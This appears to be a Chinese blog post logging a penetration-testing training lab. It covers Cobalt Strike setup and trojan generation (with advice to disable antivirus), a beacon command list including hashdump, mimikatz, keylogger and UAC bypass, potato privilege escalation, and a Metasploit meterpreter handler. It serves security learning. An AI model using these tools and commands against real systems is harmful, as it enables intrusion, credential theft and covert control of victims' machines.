毕业实习-9

一、CS安装(先安好Java环境)

1.1 server端

把CS全部文件下上传到kali上,并给足权限chmod +x 文件名

在这里插入图片描述

在服务端运行起来./teamserver IP 密码

在这里插入图片描述

本地电脑使用客户端连接即可

在这里插入图片描述

主要输入HOST、Port、password即可(检查好地址和密码是否与上面的一致)

在这里插入图片描述

成功登录进来

在这里插入图片描述

1.2 client端

设置监听器

在这里插入图片描述

一定要设置好Host!

在这里插入图片描述

可以看到成功设置监听器

在这里插入图片描述

生成木马后门

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

成功在桌面生成一个木马(记得关闭杀毒软件!不然会被清理掉)

在这里插入图片描述

运行即可上线CS

在这里插入图片描述

二、用户组和用户、windows信息搜集命令

以下是Windows用户组和用户信息收集的一些常用命令:

whoami                           显示当前用户的用户名  
whoami /groups                  显示当前用户所属的所有组  
net user                        列出本地计算机上的所有用户账户  
net user <username>             查看指定用户的详细信息  
net localgroup                  列出本地计算机上的所有用户组  
net localgroup <groupname>      查看指定用户组的所有成员  
wmic useraccount get name,sid   列出所有用户及其对应的SID  
whoami /priv                    显示当前用户的权限列表  
net localgroup <groupname> /domain 查看域中指定用户组的权限  
systeminfo                      显示计算机详细配置信息  
query user                      列出当前登录的用户会话  
browserpivot                    注入受害者浏览器进程  
sleep 3                         全部命令3秒执行  
bypassuac                       绕过UAC  
cancel                          取消正在进行的下载  
checkin                         强制让被控端回连一次  
clear                           清除beacon内部的任务队列  
connect                         连接到Beacon peer通过TCP  
covertvpn                       部署Covert VPN客户端  
cp                              复制文件  
elevate                         尝试提权  
execute                          在目标上执行程序(无输出)  
execute-assembly                在目标上内存中执行本地.NET程序  
exit                            退出beacon  
getprivs                        启用当前令牌的系统权限  
getsystem                       尝试获取SYSTEM权限  
getuid                          获取用户ID  
hashdump                        转储密码哈希值  
help                            帮助  
inject                          在特定进程中生成会话  
jobkill                         杀死一个后台任务  
jobs                            列出后台任务  
kerberos_ccache_use            从ccache文件中导入票据应用于此会话  
kerberos_ticket_purge          清除当前会话的票据  
kerberos_ticket_use            从ticket文件中导入票据应用于此会话  
keylogger                       键盘记录  
kill                            结束进程  
link                            通过命名管道连接到Beacon peer  
logonpasswords                  使用mimikatz转储凭据和哈希值  
ls                              列出文件  
make_token                      创建令牌以传递凭据  
mimikatz                        运行mimikatz  
mkdir                           创建一个目录  
mv                              移动文件  
net                             net命令  
note                            备注  
portscan                        进行端口扫描  
pwd                             当前目录位置  
reg                             查询注册表  
rev2self                        恢复原始令牌  
rm                              删除文件或文件夹  
rportfwd                        端口转发  
run                             在目标上执行程序(返回输出)  
runas                           以另一个用户权限执行程序  
runasadmin                     在高权限下执行程序

三、总结手工提权思路,拿土豆提权

3.1 手工提权思路

在这里插入图片描述

3.2 土豆提权

安装cs插件

在这里插入图片描述

使用土豆插件提权

在这里插入图片描述

配置好listener

在这里插入图片描述

土豆提权(这里没有成功,换到win7系统成功)

在这里插入图片描述

四、用CS插件提权

前面步骤与土豆提权相同,直接看结果

在这里插入图片描述

五、MSF提权

在kali中生成正向木马

在这里插入图片描述

将生成的木马拖到目标机的文件夹

在这里插入图片描述
在这里插入图片描述

msfconsole                                         # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler                          # 使用这个模块连接远程木马;
set payload windows/x64/meterpreter/bind_tcp  	   # 设置正向连接payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set rhost 192.168.100.150					       # 目标主机ip
set lport 6666                                     # 我们的kali本机端口
exploit

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

输入shell,可以进入相应的文件夹里,输入ipconfig可以查相应的ip地址

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值